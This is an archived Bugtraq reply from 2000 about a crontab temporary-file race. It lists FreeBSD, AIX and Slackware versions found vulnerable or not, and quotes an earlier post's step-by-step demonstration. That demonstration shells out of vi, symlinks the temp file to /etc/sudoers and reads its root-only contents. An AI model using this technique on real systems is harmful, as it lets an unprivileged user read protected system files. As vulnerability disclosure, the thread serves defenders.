[17344] in bugtraq
Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file
daemon@ATHENA.MIT.EDU (Fabio Pietrosanti (naif))
Wed Oct 25 13:40:26 2000
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID: <Pine.LNX.4.21.0010251221420.7175-100000@naif.inet.it>
Date: Wed, 25 Oct 2000 12:30:47 +0200
Reply-To: naif@inet.it
From: "Fabio Pietrosanti (naif)" <fabio@TELEMAIL.IT>
X-To: Sergey Nenashev <alf@ISD.MEMONET.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <39F5BF01.3AE80375@isd.memonet.ru>
Tested also on:
FreeBSD 3.3 = Vulnerable
FreeBSD 2.2.8 = Vulnerable
Aix 4.2 = Not Vulnerable
Linux Slackware 7.0 = Not Vulnerable
Linux Slackware 4.0 = Not Vulnerable
naif
On Tue, 24 Oct 2000, Sergey Nenashev wrote:
> Hi,
>
> Tested on
> 4.0-RELEASE FreeBSD 4.0-RELEASE #9
> 4.1-RELEASE FreeBSD 4.1-RELEASE #1:
>
>
> Can read any file wich start with comment simbol (#)
>
>
>
> $ ls -l /etc/sudoers
> -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
> $ id
> uid=1002(alf) gid=1002(alf) groups=1002(alf)
>
>
> $ crontab -e
> ~
> ~
> ~
> /tmp/crontab.hLmjTbK417
> :!sh
>
> [ #### Make simbolik link]
> > rm /tmp/crontab.hLmjTbK417
> > ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
> > exit
>
> [ #### quit vi ]
> /tmp/crontab.hLmjTbK417
> crontab: installing new crontab
>
> [ #### start crontab editor]
>
> $ crontab -e
> [####### See in vi]
> # sudoers file.
> #
> # This file MUST be edited with the 'visudo' command as root.
> #
> # See the sudoers man page for the details on how to write a sudoers
> file.
> #
>
> # Host alias specification
>
> # User alias specification
>
> # Cmnd alias specification
>
> # User privilege specification
> root ALL=(ALL) ALL
> alf ALL=(ALL) ALL
> ~
> ~
> ~
>
>
>
>
> If file started with no # then crontab sad
>
> "/tmp/crontab.GAeNMP1357":2: bad minute
> crontab: errors in crontab file, can't install
>
>
>
>
> --
> ------
> Alf Delems<alf@isd.memonet.ru>
>
